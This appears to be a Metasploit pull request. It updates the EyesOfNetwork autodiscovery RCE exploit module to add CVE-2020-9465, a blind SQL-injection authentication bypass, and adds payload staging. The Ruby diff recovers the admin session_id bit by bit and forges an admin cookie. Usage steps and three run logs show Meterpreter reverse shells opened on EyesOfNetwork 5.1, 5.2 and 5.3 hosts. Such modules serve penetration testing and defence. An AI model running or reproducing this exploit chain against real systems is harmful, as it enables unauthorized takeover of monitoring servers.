@@ -243,11 +250,17 @@ def sqli_to_admin_session
 
   def get_session_id
     print_status("Calculating the admin 'session_id' value. This will take a while...")
-    bits = [2] * @session_id_size
-    (0...@session_id_size).each { |i| bits[i] = i }
+
     session_bits = []
-    bits.each { |j| session_bits << guess_bit(j) }
-    @session_id = session_bits.join("").to_i(2)
+    interval = @session_id_size / 4  # print updates in intervals of 4
+    0.upto(@session_id_size - 1) do |position|
+      session_bits << guess_bit(position)
+      next if position == 0 || position % interval != 0
+      vprint_status("Calculation is #{(position.fdiv(@session_id_size) * 100).round.to_s.rjust(3)}% complete")
+    end
+    vprint_status("Calculation is 100% complete") if (@session_id_size - 1) % interval != 0
+
+    @session_id = session_bits.join.to_i(2)
     print_good("Obtained admin 'session_id' value: #{@session_id}")
     @cookie = "session_id=#{@session_id}; user_name=admin; user_id=1; group_id=1;"
   end


### PR DESCRIPTION
# About
This change updates the eyesofnetwork_autodiscovery_rce module at /modules/exploits/linux/http/ to include CVE-2020-9465, thereby extending the use of this module to EyesOfNetwork versions 5.1 and 5.2 (instead of just 5.3), while also adding a fallback authentication bypass for version 5.3 in case the existing methods fail. The documentation for this module is also updated.

This update also adds the `Msf::Exploit::CmdStager` mixin to make the module compatible with linux/x86 and linux/x64 payloads, including meterpreter payloads. Previously, only cmd/unix/ payloads were supported.

CVE-2020-9465 is an authentication bypass via SQLI that can result in RCE only via the same exploit chain as the bypass methods used by the current module for EON 5.3 (CVE-2020-8656 and CVE-2020-8657). Because of this, updating the current module seems preferable over adding a new module.

# Vulnerable System
EyesOfNetwork versions 5.1, 5.2 and 5.3.

# Verification Steps
1. Install the module as usual
2. Start msfconsole
3. Do: `use exploit/linux/http/eyesofnetwork_autodiscovery_rce`
4. Do: `set RHOSTS [IP]`
5. Do: `set payload [payload]`
6. Do: `set LHOST [IP]`
7. Do: `exploit`

# Options
1.  `Proxies`. This option is not set by default.
2.  `RHOSTS`. To use: `set RHOSTS [IP]`
3.  `RPORT`. The default setting is `443`. To use: `set RPORT [PORT]`
4.  `SERVER_ADDR`. This option only applies to EON version 5.3 and is not set by default.
5.  `SSL`. The default setting is `true`, because HTTPS is required for the module to work.
6.  `TARGETURI`. This option is the base path. `/` by default.
7.  `VHOST`. This option is not set by default.

# Advanced Options
1. `SQLI_SLEEP`. The SQLI sleep value to be used when attempting to exploit CVE-2020-9465. The default value is 1.

# Payload Options
1. `LHOST`. To use: `set LHOST [IP]`
2. `LPORT`. The default setting is `4444`. To use: `set LPORT [PORT]`

## Scenarios
1. EyesOfNetwork version 5.1
```
msf5 exploit(linux/http/eyesofnetwork_autodiscovery_rce) > show options

Module options (exploit/linux/http/eyesofnetwork_autodiscovery_rce):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   Proxies                       no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS       192.168.1.1      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT        443              yes       The target port (TCP)
   SERVER_ADDR                   yes       EyesOfNetwork server IP address (if different from RHOST)
   SRVHOST      0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT      8080             yes       The local port to listen on.
   SSL          true             no        Negotiate SSL/TLS for outgoing connections
   SSLCert                       no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI    /                yes       Base path to EyesOfNetwork
   URIPATH                       no        The URI to use for this exploit (default is random)
   VHOST                         no        HTTP server virtual host


Payload options (linux/x64/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.1.2      yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   1   Linux (x64)


msf5 exploit(linux/http/eyesofnetwork_autodiscovery_rce) > exploit

[*] Started reverse TCP handler on 192.168.1.2:4444 
[*] Target is EyesOfNetwork version 5.1 or earlier. Attempting exploitation using CVE-2020-9465.
[+] The target seems vulnerable.
[*] Verified that the admin user has at least one active session.
[*] Found the admin 'session_id' size: 31
[*] Calculating the admin 'session_id' value. This will take a while...
[+] Obtained admin 'session_id' value: 1856115646
[*] Command Stager progress - 100.00% done (897/897 bytes)
[*] Sending stage (3012516 bytes) to 192.168.1.1
[*] Meterpreter session 1 opened (192.168.91.2:4444 -> 192.168.1.1:55744) at 2020-05-19 08:48:37 -0400
```
2. EyesOfNetwork version 5.2
```
msf5 exploit(linux/http/eyesofnetwork_autodiscovery_rce) > exploit

[*] Started reverse TCP handler on 192.168.1.2:4444 
[*] Target is EyesOfNetwork version 5.2. Attempting exploitation using CVE-2020-9465.
[+] The target seems vulnerable.
[*] Verified that the admin user has at least one active session.
[*] Found the admin 'session_id' size: 31
[*] Calculating the admin 'session_id' value. This will take a while...
[+] Obtained admin 'session_id' value: 1445224287
[*] Command Stager progress - 100.00% done (897/897 bytes)
[*] Sending stage (3012516 bytes) to 192.168.1.3
[*] Meterpreter session 2 opened (192.168.1.2:4444 -> 192.168.1.3:38070) at 2020-05-19 08:49:46 -0400
```
3. EyesOfNetwork version 5.3
```
msf5 exploit(linux/http/eyesofnetwork_autodiscovery_rce) > exploit

[*] Started reverse TCP handler on 192.168.1.2:4444 
[*] Target is EyesOfNetwork version 5.3 or later. Attempting exploitation using CVE-2020-8657 or CVE-2020-8656.
[*] Using generated API key: a926605f4e617fd68bbb86112156b41ea2406503859dad58b0d0aefcc848b755
[+] Authenticated as user r6veXwtZ2zh
[*] Command Stager progress - 100.00% done (897/897 bytes)
[*] Sending stage (3012516 bytes) to 192.168.1.4
[*] Meterpreter session 3 opened (192.168.1.2:4444 -> 192.168.1.4:60244) at 2020-05-19 08:50:04 -0400
```